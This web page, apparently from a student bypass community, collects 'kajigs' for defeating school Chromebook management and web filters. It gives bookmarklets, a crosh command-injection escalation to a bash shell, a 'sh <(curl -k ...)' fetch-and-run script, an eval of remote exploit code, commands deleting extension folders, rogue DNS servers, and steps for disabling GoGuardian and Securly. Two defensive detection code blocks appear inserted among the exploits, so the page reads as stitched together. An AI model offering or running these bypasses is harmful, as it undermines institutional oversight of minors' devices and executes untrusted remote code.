<head>
<link rel="image/icon">
</head>
<link href="./prism.css" rel="stylesheet" />
<script src="./prism.js"></script>
<title>Kajigs</title>
<!-- Paste in MD to html after here -->
<a href="../"><img src="https://raw.githubusercontent.com/T3M1N4L/T3M1N4L/main/images/XOsX.gif" style=" float: left; padding-right: 10px; width: 90px !important;"></img></a>
<h1 id="titanium-network-kajigs">Kajigs</h1>
<p>A repository of methods you can employ enabling you to bypass restrictions!</p>
<p><strong>PLEASE DO NOT USE KAJIGS FOR ILLEGAL ACTIVITY</strong></p>
<p>Limitations: Methods which are considered aggressive, such as removing or damaging devices (e.g. removing Enterprise Enrollment), are not allowed.</p>
<p>For quality purposes, only <code class="normlcode">Featured</code> kajigs will be listed here.</p>
<h3 id="current-tags">Current Tags:</h3>
<ul>
<li>Webview bypasses: kajigs that use a webview to operate</li>
<li>Extension bypasses: kajigs that allow you to manipulate extensions (adding, disabling, etc.)</li>
<li>Bookmarklets: bookmarks that run JavaScript code to do something, usually embedding proxies or similar into your current page</li>
<li>Filter bypasses: kajigs that let you get around your filters</li>
<li>Other: kajigs that do not fit in the aforementioned categories</li>
<li>Mod post: mod posts. May or may not be kajigs, read them anyways</li>
<li>Patched: these kajigs have been patched by software vendors. THIS DOES NOT MEAN THE KAJIG IS UNUSABLE. For example, see "Chrome100 - Downgrade your Chrome OS"</li>
<li>Featured: Extraordinary kajigs (chosen by mods)</li>
<li>chromeOS: chromeOS specific kajigs</li>
<li>Windows: Windows specific kajigs</li>
<li>macOS: macOS specific kajigs</li>
<li>Mobile: Mobile specific kajigs</li>
</ul>
<h2 id="prevent-tab-close-goguardian-etc">Prevent Tab Close (GoGuardian, etc.)</h2>
<p>This is a really old exploit that dates back to 2017/2018. Essentially, it prevents your tab from being closed in the simplest way. Use as needed.</p>
<pre><code class="language-js">javascript: onbeforeunload = (i) => 1;
</code></pre>
<p>Paste the above in a bookmark and run it on whatever tab you want to prevent force closing!</p>
<h2 id="tab-disguise">Tab Disguise</h2>
<p>Disguises the icon and name of the tab you're on with the icon and name given in the code</p>
<p>Setup: Create a bookmark, copy the provided code and paste it in as the URL (name it whatever you want).</p>
<pre><code class="language-js">javascript: (function () {
var link =
document.querySelector("link[rel*='icon']") ||
document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href =
"https://ssl.gstatic.com/docs/doclist/images/infinite_arrow_favicon_5.ico";
document.title = "My Drive - Google Drive";
console.log(document.title);
document.getElementsByTagName("head")[0].appendChild(link);
})();
</code></pre>
<p>Alternatively, you can use this code to update the disguise every second (same setup)</p>
<pre><code class="language-js">javascript: function gcloak() {
var link =
document.querySelector("link[rel*='icon']") ||
document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href =
"https://ssl.gstatic.com/docs/doclist/images/infinite_arrow_favicon_5.ico";
document.title = "My Drive - Google Drive";
console.log(document.title);
document.getElementsByTagName("head")[0].appendChild(link);
}
gcloak();
setInterval(gcloak, 1000);
</code></pre>
<p>The 2 scripts given use a Google Drive disguise as an example, but they can be customized</p>
<ul>
<li>To change the favicon, replace the link in line 4 (the <code class="normlcode">link.href</code> value) with your own image link</li>
<li>To change the title, replace the text in the quotation marks on line 5 with your own title</li>
<li>To change the timing, replace the number in line 9 with your own timing (in milliseconds)</li>
</ul>
<h2 id="porta-proxy-hapara">Porta Proxy (Hapara)</h2>
<p>Allows you to access a given site within other tabs; bypasses Hapara</p>
<p>Setup: Create a bookmark, copy the provided code and paste it in as the URL (name it whatever you want).</p>
<pre><code class="language-js">javascript:((function(){
var a,b,c;c="WEBSITE HERE",
b=document.createElement("iframe"),
b.setAttribute("src",c),b.setAttribute("id","rusic-modal"),
b.setAttribute("style","position: fixed; width: 100%; height: 100%; top: 0; left: 0; right: 0; bottom: 0; z-index: 99999999999; background-color: #fff;"),
a=document.getElementsByTagName("body")[0],
a.appendChild(b)})).call(this)
</code></pre>
<p>To close the Porta Proxy, create another bookmark with this code:</p>
<pre><code class="language-js">javascript: var element = document.getElementById("rusic-modal"); element.parentNode.removeChild(element);
</code></pre>
<p>In order to use Porta-Proxy, you must supply your own proxy website link in the bookmarklet; you put the link inside the quotation marks that read "WEBSITE HERE", and you have to include https://</p>
<h2 id="permanently-remove-extensions-past-v106">Permanently Remove Extensions (Past v106)</h2>
<p>Credits: CoolElectronics</p>
<p>This exploit is currently the most flexible and effective method in TN as a result of the bounty made by luphoria. The criterion was simply to bypass the Enterprise Policy ArcEnabled: false, but it resulted in a much more effective exploit in the end.</p>
<p>This exploit details another way to permanently delete extensions. Once done, you can update or restart your chromebook and the extensions will stay gone until you powerwash.</p>
<p>You need a usb for downgrading, and rudimentary knowledge of bash is recommended.</p>
<h3 id="steps">STEPS:</h3>
<p>Downgrade to any version below 103. Instructions are in "Chrome100 - Downgrade your Chrome OS".</p>
<p>Press Ctrl+Alt+T to open a crosh window. If it’s blocked by extensions, use LTBEEF. If it’s policy blocked (“The person who set up this computer has chosen to block this site”) you can try downgrading to a version below 90, where crosh had a different URL.
Type in <code class="normlcode">set_cellular_ppp \';bash;exit;\'</code> and hit enter.</p>
<p>You now have access to a bash shell, logged in as chronos. More information about the permissions of this shell is at the bottom.</p>
<p>Type <code class="normlcode">rm -rf ~/Extensions/*</code>. THIS WILL BREAK EVERY EXTENSION ON YOUR CHROMEBOOK. If there are extensions you want to keep, they can be selectively removed by ID.</p>
<p>Run <code class="normlcode">chmod 000 ~/Extensions</code>. This marks the extension folder as read only, stopping it from updating in the future or any new extensions from being installed.</p>
<p>You can now restart chrome, allowing it to update to the latest version. Once rebooted onto the latest version, all removed extensions will have the default icon and won’t function at all</p>
<p><strong>If you would like Root Access, go to Root Escalation</strong></p>
<p>You can also run <code class="normlcode">set_cellular_ppp \'chmod 777 ~/Extensions;rm -rf ~/Extensions;mkdir ~/Extensions;chmod 000 ~/Extensions;echo done;exit\'</code> in crosh to do it all in one step</p>
<p><a href="https://discord.com/channels/419123358698045453/1033121753263771709">https://discord.com/channels/419123358698045453/1033121753263771709</a></p>
<h2 id="root-escalation">Root Escalation</h2>
<p>Have the ability to run developer mode content, enable developer mode, bypass pretty much everything with one exploit. Will require the downgrade methods.</p>
<p>Has so many branches that I’m just going to link the Kajig discussion. Check the pins in the TN Discord server.</p>
<p><a href="https://discord.com/channels/419123358698045453/1033537020854800434">https://discord.com/channels/419123358698045453/1033537020854800434</a></p>
<h2 id="swamp-for-goguardian-only">[swamp] FOR GOGUARDIAN ONLY:</h2>
<p>Functions like LTBEEF, the GUI-based exploit which Bypassi originally led for disabling extensions. However, unlike the Bypassi-based exploit, swamp still remains unpatched on versions post v102 up to even v107.</p>
<p>This will allow you to:</p>
<ul>
<li>Disable force-installed extensions similarly to LTBEEF even on Chrome 107 where it's patched</li>
<li>Run bookmarklets on any page even when they are blocked</li>
<li>Break GoGuardian until powerwash (or until you choose to turn it back on)</li>
<li>Run a custom DNS to block network requests without actually being on a DNS</li>
<li>Run your own custom code with access to most of the chrome API</li>
</ul>
<p><a href="https://discord.com/channels/419123358698045453/1040775494406250548">https://discord.com/channels/419123358698045453/1040775494406250548</a></p>
<h2 id="kiosk-exploit-de-licensed-original">KIOSK Exploit (DE-LICENSED) (Original):</h2>
<p>Although many variations of this exploit exist, this was the very original implementation of it. However, the process never went as far or flexible as a full Chrome browser window being able to be created out of this method rather than just a simple bypass within the KIOSK app.</p>
<p>Credits to B3AT and Divide for this exploit.</p>
<p>This exploit allows you to open an unrestricted Chrome instance within a kiosk app, i.e. with the kiosk user account permissions.</p>
<h3 id="steps-1">Steps:</h3>
<ul>
<li>Any kiosk app installed</li>
<li>[for v77<=x<=v85] OOBE/fresh install</li>
<li>Sign out</li>
<li>Turn Wi-Fi off</li>
<li>Enable ChromeVox (ctrl+alt+z)</li>
<li>Open a kiosk app</li>
<li>Spam Search+o+k (you do have to re-click o and k)</li>
<li>While spamming click "Diagnose"</li>
</ul>
<p>Note: The exploit should work consistently on v76 or below. It's still possible to pull off on v85 or below, but only once (right after you powerwash).</p>
<h2 id="userpolicy-bypass">UserPolicy Bypass:</h2>
<p>This should enable ARC (Play Store) and unblock all <strong>policy</strong> blocked URLs.</p>
<p>When you connect to a Wi-Fi network without the custom DNS, the policy will reload to normal, but some changes will persist; more testing is needed. This is useful because most root exploits require ARC in some form.</p>
<h3 id="you-need">You need:</h3>
<ul>
<li>The ability to downgrade to a version below 102</li>
<li>A way to access crosh. If it's blocked via extension, use LTBEEF. If it's blocked by user policy, you must use a combination of Incognito Exploit (v81) and Crosh Bypass (Daybreak)</li>
<li>A router or hotspot capable of either blocking websites via parental control or setting a custom DNS (129.213.58.41)</li>
</ul>
<h3 id="steps-2">Steps:</h3>
<ul>
<li>Downgrade to a version</li>
<li>Open crosh (ctrl+alt+t)</li>
<li>Elevate to a chronos shell by typing in set_cellular_ppp ';bash;exit'</li>
<li>Run the command <code class="normlcode">sh <(curl -k https://coolelectronics.me/bypass.sh) & disown</code></li>
<li>Remove your school account, log out or just clear it in any way you can. The method varies depending on how device policy is set up.</li>
<li>In your router settings, set the DNS to <code class="normlcode">129.213.58.41</code> or <code class="normlcode">block m.google.com</code>. (NOT THE NETWORK DNS ON THE CHROMEBOOK, IT WONT WORK; ROUTER!)</li>
</ul>
<p><strong>[EXTRAS]:</strong> personalDNSfilter and hotspot or DNS Sinkhole + Hotspot on iOS can be used; NextDNS</p>
<ul>
<li>Log into your school account</li>
</ul>
<p>Results should prompt you about a PIN and Google Play then drop you into an account where everything works as normal but no user policies are set. If you get a "sign in required" error, try steps again.</p>
<p><a href="https://discord.com/channels/419123358698045453/1040639727595950180">https://discord.com/channels/419123358698045453/1040639727595950180</a></p>
<h2 id="ltbeef---disable-any-extension">LTBEEF - Disable ANY Extension</h2>
<p>LTBEEF is an incredibly powerful exploit which can be utilized to disable any extension, including GoGuardian, Securly, Lightspeed, ....</p>
<p>Credits to Bypassi and CompactCow.</p>
<h3 id="bookmarklets">Bookmarklets</h3>
<p><strong>Option A - GUI Based</strong></p>
<pre><code class="language-js">javascript: fetch("https://compactcow.com/ltbeef/exploit.js").then((data) => {
data.text().then((text) => {
eval(text);
});
});
</code></pre>
<p>Click it once (not on a new tab) to get to the correct webstore page, then again to open the UX.</p>
<p><strong>Option B - if Option A doesn't load</strong></p>
<ul>
<li>Go to <a href="https://chrome.google.com/webstorex">https://chrome.google.com/webstorex</a> and run this bookmarklet</li>
</ul>
<pre><code class="language-js">javascript: prompt("Extension IDs here: (seperated by commas)")
.split(",")
.forEach((i) => {
chrome.management.setEnabled(i.trim(), !1);
});
</code></pre>
<h3 id="if-bookmarklets-are-disabled">If bookmarklets are disabled:</h3>
<ul>
<li>Set your DNS to the following:
<code class="normlcode">129.213.138.223</code></li>
<li>Visit chrome://restart</li>
<li>Visit <a href="https://chrome.google.com/">https://chrome.google.com/</a></li>
<li>You should see a warning. Click on the warning symbol (⚠️) and type thisisunsafe.</li>
<li>You should see a simple interface which lets you enable and disable your extensions.</li>
</ul>
<h2 id="history-deletion-2-v106">History Deletion #2 (v106+)</h2>
<p><strong>IMPORTANT NOTE: THIS WILL WIPE ALL SYNCED DATA, NOT JUST HISTORY</strong></p>
<p>SYNC DATA INCLUDES APPS, NON-MANAGED EXTENSIONS, BOOKMARKS, AND MORE</p>
<ul>
<li>Make sure you're synced to google chrome or else it won't work, as you need to be able to access chrome.google.com/sync</li>
<li>Go to <a href="https://chrome.google.com/sync">https://chrome.google.com/sync</a></li>
<li>Press "clear data" at the bottom</li>
<li>Sign out of your account and remove the account from the device</li>
<li>Sign back in and history should be gone</li>
</ul>
<h2 id="downgrade-your-chrome-os-chrome100">Downgrade your Chrome OS (Chrome100)</h2>
<p>This provides a basic tool required for many exploits as a prerequisite.</p>
<p>Chrome100 is a website which enables you to download old versions of Chrome OS for your Chromebook.
Old versions may have vulnerabilities which are now patched; thus, these old Chrome OS images are essential for many exploits!</p>
<p><a href="https://chrome100.dev">https://chrome100.dev</a></p>
<p><strong>Maintained by Divide</strong></p>
<h2 id="ingot-extension-removal-dns">Ingot Extension Removal (DNS)</h2>
<ul>
<li>Go to the settings then click the Wi-Fi you are on.</li>
<li>Scroll down to where it says Network, click on that then select Nameservers</li>
<li>Select Custom Nameservers and in the four prompts enter <code class="normlcode">198.98.53.76</code></li>
<li>Go to a new tab and in the url bar type and run <code class="normlcode">chrome://restart</code> (this will restart your Chromebook without signing you out)</li>
<li>Go to a new tab and search <code class="normlcode">chrome.google.com</code>. If that doesn't work try <code class="normlcode">https://chrome.google.com/webstoreV5Y8F</code></li>
<li>Type <code class="normlcode">thisisunsafe</code> and the GUI will load.</li>
</ul>
<p>CREDIT TO COMPACTCOW AND NEBELUNG AND BYPASSI</p>
<h2 id="unblocked-devtoolsflags-advanced">Unblocked DevTools/Flags (ADVANCED)</h2>
<p>This is a guide on how to use chrome launch options and a thread for discussing exploits related to the bash shell. I have been requested to make this several times</p>
<p>First of all, you will need some knowledge of bash, and you must know how to use vi.</p>
<p>This builds off of Permanently Remove Extensions (past v106).</p>
<p>Follow the instructions there, and stop once you have the bash shell.</p>
<ul>
<li>Run <code class="normlcode">cd ~/Downloads</code></li>
<li>Run <code class="normlcode">vi exploit.sh</code> to create a new shell file.</li>
<li>In this shell file, put the line <code class="normlcode">pkill -9 chrome</code></li>
<li>After that, head over to <code class="normlcode">chrome:version</code>, and next to "command line options:" copy the entire really long thing</li>
<li>Paste it into vi as a new line.</li>
</ul>
<p>Now you can add whatever launch options you want! These are like the flags in chrome:flags, but there are way more available.</p>
<p>The full list is here: <a href="https://peter.sh/experiments/chromium-command-line-switches/">https://peter.sh/experiments/chromium-command-line-switches/</a></p>
<p>Some notable ones are: <code class="normlcode">--force-devtools-available</code> (devtools), <code class="normlcode">--bwsi</code> (guest mode), <code class="normlcode">--kiosk</code> (useless but funny), <code class="normlcode">--oauth-client-id</code> (breaks policy updating and profile syncing), <code class="normlcode">--disable-extensions-except</code>, <code class="normlcode">--show-login-dev-overlay</code>/<code class="normlcode">--show-oobe-dev-overlay</code>, <code class="normlcode">--enable-hangout-services-extension-for-testing</code> (adds a bunch of useless extensions), and more.</p>
<p>To execute chrome with the launch options set, exit vi (impossible), and run <code class="normlcode">sh <(cat exploit.sh) & disown</code></p>
<h2 id="istealyourdns-dns">IStealYourDNS (DNS)</h2>
<p>IStealYourDNS is a TitaniumNetwork-partnered service. With it, you can seamlessly block many web filters (GoGuardian, Lightspeed, ...) and never think about bypassing filters ever again.</p>
<h3 id="installation">Installation</h3>
<p>To install it, simply open your Wi-Fi's DNS settings, and set the name servers to "Custom" - replace any options available with <code class="normlcode">72.5.33.65</code>. If you have multiple boxes, set the last one to <code class="normlcode">1.1.1.1</code>.</p>
<p>Then, simply restart and you're done!</p>
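<p>From the network side, a client that has switched to a custom name server shows up as DNS traffic to a resolver the network does not operate. The following is an added example, not part of the original page: it scans constructed flow records (the log format, the internal addresses and the approved-resolver list are assumptions) and reports every client that sends DNS to any other resolver.</p>

```javascript
// Added example, not from the original page.
// Assumed: the two resolvers this network operates itself.
const APPROVED_RESOLVERS = new Set(["10.20.0.2", "10.20.0.3"]);
// Plain DNS (53) and DNS over TLS (853).
const DNS_PORTS = new Set([53, 853]);

// Constructed sample flow records in an assumed key=value format.
const SAMPLE_LOG = `
2024-03-04T09:00:01Z src=10.20.4.17 dst=10.20.0.2 proto=udp dport=53
2024-03-04T09:00:05Z src=10.20.4.31 dst=129.213.58.41 proto=udp dport=53
2024-03-04T09:00:06Z src=10.20.4.31 dst=129.213.58.41 proto=udp dport=53
2024-03-04T09:01:12Z src=10.20.4.44 dst=72.5.33.65 proto=tcp dport=53
2024-03-04T09:01:13Z src=10.20.4.44 dst=1.1.1.1 proto=udp dport=53
2024-03-04T09:02:40Z src=10.20.4.17 dst=93.184.216.34 proto=tcp dport=443
malformed line without fields
`;

// Parse one record; returns null for blank or malformed lines.
function parseFlow(line) {
  const parts = line.trim().split(/\s+/);
  const rec = { time: parts[0] };
  for (const kv of parts.slice(1)) {
    const eq = kv.indexOf("=");
    if (eq > 0) rec[kv.slice(0, eq)] = kv.slice(eq + 1);
  }
  const dport = Number(rec.dport);
  if (!rec.src || !rec.dst || !Number.isInteger(dport)) return null;
  return { time: rec.time, src: rec.src, dst: rec.dst, proto: rec.proto, dport };
}

// Group DNS flows to non-approved resolvers by client address.
function findRogueDns(logText) {
  const byClient = new Map();
  for (const line of logText.split("\n")) {
    const flow = parseFlow(line);
    if (!flow || !DNS_PORTS.has(flow.dport)) continue;
    if (APPROVED_RESOLVERS.has(flow.dst)) continue;
    const entry = byClient.get(flow.src) ||
      { resolvers: new Set(), queries: 0, firstSeen: flow.time };
    entry.resolvers.add(flow.dst);
    entry.queries += 1;
    byClient.set(flow.src, entry);
  }
  return [...byClient].map(([src, e]) => ({
    src,
    resolvers: [...e.resolvers].sort(),
    queries: e.queries,
    firstSeen: e.firstSeen,
  }));
}

console.log(findRogueDns(SAMPLE_LOG));
```

<p>The matching control is an egress rule that only lets clients reach the approved resolvers on ports 53 and 853, which turns this report into a list of dropped connections.</p>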
<h2 id="better-dns-bypass-dns">Better DNS Bypass (DNS)</h2>
<ul>
<li>Know the credentials of your School's WIFI or utilize a hotspot</li>
<li>Go to <code class="normlcode">chrome:policy</code> and Ctrl+F for <code class="normlcode">deviceopennetworkconfig</code>; click show more</li>
<li>Edit the attached ONC, changing the GUID to the guid in the policy and the security to the security in the json; same with the name, SSID, and finally change the passphrase to the password</li>
<li>Import the ONC in <code class="normlcode">chrome:network#general</code></li>
<li>Go to Wi-Fi settings as normal and the DNS shouldn't be blocked</li>
</ul>
<p>ONC: <a href="https://cdn.discordapp.com/attachments/1042601318105239562/1042928899371323402/bypass.onc">https://cdn.discordapp.com/attachments/1042601318105239562/1042928899371323402/bypass.onc</a></p>
<h2 id="get-proton-vpn-on-chromebooks">Get Proton VPN on Chromebooks</h2>
<ul>
<li>Create or log into a proton VPN account</li>
</ul>
<p><a href="https://account.protonvpn.com/signup">https://account.protonvpn.com/signup</a></p>
<ul>
<li>Once you have an account go to - account > OpenVPN / IKEv2 username</li>
<li>Copy the username and password</li>
<li>Unzip the files and choose any server that you want to use (like us-19 or s/t)</li>
<li>Edit it in the Text editor app (it's a built-in chrome app on Chromebook) or any other text editor</li>
<li>All the way at the end, after "TLSAuthContents": "-----BEGIN OpenVPN Static key V1----- put in</li>
</ul>
<pre><code class="normlcode"> ,
"Username": "(Put your username here)",
"Password": "(Put your password here)"
</code></pre>
<p>You can just copy and paste it and you'll get the right formatting.</p>
<p>Make sure that you start the paste right after the end quotation mark.</p>
<ul>
<li>Save the onc file</li>
<li>Upload it to <code class="normlcode">chrome://network#general</code> all the way at the bottom where it says Import ONC File (don't worry if you don't notice anything, just try scrolling down a little more) and it should say <code class="normlcode">Networks imported: 1</code> (regardless of how many you actually imported)</li>
</ul>
<h2 id="incognito-exploit-v81">Incognito Exploit (v81)</h2>
<p>This is the first Licensed exploit to be declassified as a Kajig!</p>
<p>This still needs to be improved.</p>
<p>Make sure to downgrade to chrome OS v81 or lower first: "Chrome100 - Downgrade your Chrome OS"</p>
<h3 id="steps-to-the-incognito-exploit-summarized">Steps to the Incognito Exploit, summarized</h3>
<p>(Steps before include getting on the login screen to the part where you are signing in as a new user. Enter your email and password but don't login. Do Alt + Shift + I. Continue to Step 1 where you spam "Privacy Policy".)</p>
<ul>
<li>Follow the steps but once it gets to the "Privacy Policy" part, spam it for a minute or 30 seconds (until it's very laggy)</li>
<li>Once you login go quickly to the Incognito Tab and do Ctrl+Shift+N</li>
<li>Do the Switch/Desktop View key and close the original Incognito Tab</li>
<li>If it continues to open policy pages, repeat Step 3.</li>
</ul>
<h3 id="benefits">Benefits:</h3>
<ul>
<li>No extensions so you won't have to worry about anything being blocked by an extension.</li>
<li>Access to a fully unrestricted YouTube.</li>
<li>Ability to sign into other google accounts. (if blocked)</li>
<li>Be able to access the majority of chrome:// urls if they were blocked by policy.</li>
<li>Get past policy blocks. (Untested fully but certain sites that were blocked by policy were unblocked for me.)</li>
<li>Use flags to further experiment with your Chromebook. Applies to chrome:// urls being unblocked.</li>
<li>Access to an "experimental" unblocked chrome. (Called experimental as it is both restricted and not restricted.)</li>
</ul>
<h3 id="possible-errors-you-may-encounter">Possible Errors (you may encounter):</h3>
<ul>
<li>When importing an onc file, crash.</li>
<li>Don't go to chrome://os-settings or try to view Settings from the Incognito tab.</li>
<li>Restarting to modify flags will close the tab, however the effects will be applied when you restart.</li>
<li>When importing an extension (unpacked or entire crx), you will encounter the error "not allowed on login screen"</li>
</ul>
<p>This exploit is still a massive WIP, and the above may be subject to change or expansion.</p>
<h2 id="process-end-method">Process End Method</h2>
<ul>
<li>Open Task Manager</li>
<li>Press 'search'+'esc'</li>
<li>Scroll all the way to the bottom and find your blocker extension and highlight it (click on it)</li>
<li>Click 'End Process' or press 'enter'</li>
<li>Immediately go to your page and see that it's unblocked</li>
<li>This will not last unless you use this bookmarklet javascript:onbeforeunload=i=>1</li>
</ul>
<p>If Task Manager is blocked:</p>
<ul>
<li>Go to <code class="normlcode">chrome-extension://</code> + your Extension ID + <code class="normlcode">/_generated_background_page.html</code></li>
<li>You can find the Extension ID by going to the puzzle piece, clicking on the 3 dots next to your filter and clicking manage extension; the ID will be in the URL</li>
<li>The link for GoGuardian is <code class="normlcode">chrome-extension://haldlgldplgnggkjaafhelgiaglafanh/_generated_background_page.html</code></li>
<li>Change the URL to <code class="normlcode">chrome://kill</code> (I recommend making it a bookmark (if your school blocked bookmarklets this one will still work))</li>
</ul>
<h2 id="personaldnsfilterhotspot">personalDNSfilter/Hotspot</h2>
<p><a href="https://f-droid.org/en/packages/dnsfilter.android/">https://f-droid.org/en/packages/dnsfilter.android/</a></p>
<ul>
<li>Download personalDNSfilter from the link</li>
<li>Install it on phone</li>
<li>Open the app</li>
<li>Click on the box beside DNS</li>
<li>Check the Disable DNS server discovery</li>
<li>Remove all dns ip</li>
<li>Set it to one of these choices:</li>
</ul>
<h3 id="dns-servers">DNS Servers:</h3>
<ul>
<li>45.128.53.172 (watch this tutorial: <a href="https://youtu.be/qo-hx0tOYxI">https://youtu.be/qo-hx0tOYxI</a>; only works with GoGuardian)</li>
<li>129.213.58.41</li>
<li>51.161.64.196</li>
</ul>
<h3 id="extras">Extras</h3>
<ul>
<li>wifi network + usb tethering</li>
<li>cellular network + hotspot</li>
<li>cellular network + hotspot app</li>
</ul>
<p>You may need to update the DNS servers on your current phone WIFI network.</p>
<h2 id="stealth-lightspeed">Stealth (Lightspeed)</h2>
<p>This trick is specifically for when your chromebook is "locked" by a teacher, and any site you go to will get closed instantly. It can also hide the tab from the teachers and get around the "[teacher's name] has blocked this site" screen.</p>
<p>The way it works is by letting you put an iframe inside of the new tab window, where most chrome extensions don't have permission. This means that if a page is "temporarily blocked" by a teacher or they lock your chromebook you can still access almost every page that works in an iframe. I don't know what it shows up as on the teacher screen, but they likely will just see the new tab and not the actual site.</p>
<ul>
<li><p>Set your default search engine to bing</p>
</li>
<li><p>Open a new tab</p>
</li>
</ul>
<p>Use this bookmarklet:</p>
<pre><code class="language-js">javascript:document.write(`<style> iframe{margin:0px; border:none; padding:0px; outline:none} body{margin:0px}</style><iframe src = "${prompt("enter url")}" width = ${window.innerWidth} height = ${window.innerHeight} />`)
</code></pre>
<p>Enter a url that you want to visit.</p>
<p>Notes:</p>
<ul>
<li>This only works if bookmarklets are enabled</li>
<li>Works ONLY with Lightspeed</li>
</ul>
<h2 id="playstore-bypass-v106">Playstore Bypass (v106+)</h2>
<p>Make sure you are upgrading or powerwashing/recovering. Chrome Device Manager's notification should appear otherwise this will not work.</p>
<p><strong>MAKE SURE TO HAVE A HOME ACCOUNT ADDED!</strong></p>
<ul>
<li>Literally just log out/shutdown/restart when the Chrome Device Manager notif appears. LOCKING DOES NOT WORK.</li>
<li>Open PlayStore and keep it open. Try to download some apps. Fiddle around with it. Don't switch accounts as that might lock you out.</li>
</ul>
<p>Add accounts in <code class="normlcode">settings -> your school account name -> add account</code>. You don't need to go to Android settings and shouldn't!</p>
<p><strong>EASIER GUIDE</strong>
After Powerwash, Recovering, removing account and adding it back in:</p>
<ul>
<li>The moment <code class="normlcode">Chrome Device Manager</code> pops up ( 💼 ) do <code class="normlcode">chrome://restart</code></li>
<li>After that open Google Play and switch to your home account</li>
</ul>
<h2 id="goguardian-discord-unblock">GoGuardian Discord Unblock</h2>
<p>This only works for Discord and Youtube.</p>
<h3 id="type-1">Type 1</h3>
<pre><code class="normlcode">data:text/html,<script>window.location.href='https://discord.com/app?%27+%27e%27.repeat(16380)%3C/script%3E
</code></pre>
<p>Open this in a new tab.</p>
<h3 id="type-2">Type 2</h3>
<p>Bookmark and open this in a new tab.</p>
<pre><code class="normlcode">javascript:window.open('https://discord.com/app?'+'e'.repeat(16384));
</code></pre>
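<p>Both variants above pad the query string with roughly 16,000 repeated characters. The following is an added example, not part of the original page or any vendor's code, of a filter-side check that takes its verdict from the parsed hostname and reports oversized or padded URLs as signals; the blocklist and the thresholds are assumptions.</p>

```javascript
// Added example, not from the original page.
const BLOCKED_HOSTS = new Set(["discord.com"]); // assumed policy list
const MAX_URL_LENGTH = 2048; // assumed inspection budget, in characters
const MAX_RUN = 64;          // assumed cap on one repeated character

// Length of the longest run of a single repeated character in s.
function longestRun(s) {
  let best = 0;
  let run = 0;
  let prev = "";
  for (const ch of s) {
    run = ch === prev ? run + 1 : 1;
    prev = ch;
    if (run > best) best = run;
  }
  return best;
}

// True when host equals a blocked host or is a subdomain of one.
function isBlockedHost(host) {
  for (const blocked of BLOCKED_HOSTS) {
    if (host === blocked || host.endsWith("." + blocked)) return true;
  }
  return false;
}

// Returns { action, reasons } for one requested URL.
// The verdict never depends on how long the URL is: the hostname is
// parsed first, and length or padding only adds reasons to the report.
function classifyUrl(raw) {
  let url;
  try {
    url = new URL(raw);
  } catch {
    // Fail closed: anything the filter cannot parse is not allowed.
    return { action: "block", reasons: ["unparseable"] };
  }
  const reasons = [];
  const host = url.hostname.toLowerCase().replace(/\.$/, "");
  const blocked = isBlockedHost(host);
  if (blocked) reasons.push("blocked-host");
  if (raw.length > MAX_URL_LENGTH) reasons.push("oversized-url");
  if (longestRun(url.search) > MAX_RUN) reasons.push("padded-query");
  const action = blocked ? "block" : reasons.length ? "flag" : "allow";
  return { action, reasons };
}

// Constructed sample input mirroring the padded URL shown above.
console.log(classifyUrl("https://discord.com/app?" + "e".repeat(16384)));
```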
<h2 id="killcurly-securly-v107">killcurly (Securly, v107+):</h2>
<p>RIP Cookie Dough to leaking. Regardless here is another exploit related to bypassing Securly.</p>
<ul>
<li>Visit <code class="normlcode">chrome://settings/signOut</code> (the O must be capital) and click the blue button. If this is "blocked_by_administrator", DM <code class="normlcode">SprinkzMC#8421</code> for an alternate URL.</li>
<li>Visit <code class="normlcode">chrome://restart</code>. Alternatively, you can go to the Securly details in <code class="normlcode">chrome://extensions</code> and click "Allow access to file URLs" or just use <code class="normlcode">chrome://kill</code> on one of its extension pages. Securly will now reload and be broken.</li>
<li>Go to <code class="normlcode">https://tinyurl.com/addsession</code> and add your school account back (personal accounts may even work for some people).
<strong>This has to be repeated each time you sign out of your computer. Feel free to test this for other extensions too.</strong></li>
</ul>
<h1 id="windows-laptop-tutorial">Windows Laptop Tutorial</h1>
<h3 id="httpslearnmicrosoftcomen-ustrainingmodulesimplement-common-integration-features-finance-ops10-exercise-1"><a href="https://learn.microsoft.com/en-us/training/modules/implement-common-integration-features-finance-ops/10-exercise-1?source=learn">https://learn.microsoft.com/en-us/training/modules/implement-common-integration-features-finance-ops/10-exercise-1</a></h3>
<blockquote>
<p>Not everything is unbl0cked; some things will still be blocked. Either figure out how to install a VPN on Microsoft Edge or deal with it :/
If you see ERR_SSL_PROTOCOL_ERROR it probably means that you were blocked.</p>
</blockquote>
<p>For the first time, you will need to sign up. After that, everything should be simple.</p>
<h2 id="signing-up">Signing Up</h2>
<p><img src="./assets/button1.png" alt="Sign in to launch VM mode"></p>
<ol>
<li>Press that</li>
<li>Sign in with your school email</li>
<li>Microsoft will ask you a few questions. Just choose anything, it doesn't matter much.</li>
<li>Finish sign up</li>
<li>You might see a captcha. Complete it, and if it doesn't complete, just refresh.</li>
<li>The captcha should be gone, and you should see a button that says "Launch VM mode" in the same place where it said "Sign in to launch VM mode"</li>
</ol>
<h2 id="starting-the-windows-laptop">Starting the Windows laptop</h2>
<p><img src="./assets/windows.png" alt="VM"></p>
<ol>
<li>Press "Launch VM mode" button</li>
<li>You should see what the image above shows</li>
<li>The password is exactly <code class="normlcode">pass@word1</code></li>
<li>Open the Edge Browser!</li>
</ol>
<h2 id="getting-a-vpn---fully-unbl-ck-the-browser">Getting a VPN - fully unbl-ck the browser</h2>
<ol>
<li>In the laptop in Edge, search up "Edge Addons"</li>
<li>In Edge Addons, search for "free VPN"</li>
<li>Find a VPN and get/install the extension</li>
<li>Press the puzzle piece at the top, and press the eye next to the extension you downloaded</li>
<li>Press on the new icon that appears at the top, and then figure out what you have to do to get the VPN working. The VPN might not work, so just install a different one.</li>
<li>Use the VPN. Some stuff might be slower but the browser will be unbl0cked.</li>
</ol>
<p>Later I might make a tutorial on fully unbl0cked Linux (like Windows) + Chrome which doesn't need a VPN and might be faster.</p>
<h1 id="loginpass">LOGINpass</h1>
<blockquote>
<p>There are 3 ways to do this. The first one probably will be hard to block. The second <em>will</em> be easy to block, if you know how to do it. The third is essentially the same as the first one but with a different route. The first and third require you to know the email of another person in the IPSD district.</p>
</blockquote>
<h2 id="important">Important:</h2>
<pre><code class="language-js">let warning = "The top and bottom of the site is chopped off. The bottom can be fixed by going fullscreen. The top will always be chopped off though. That is why this exploit might be annoying."
</code></pre>
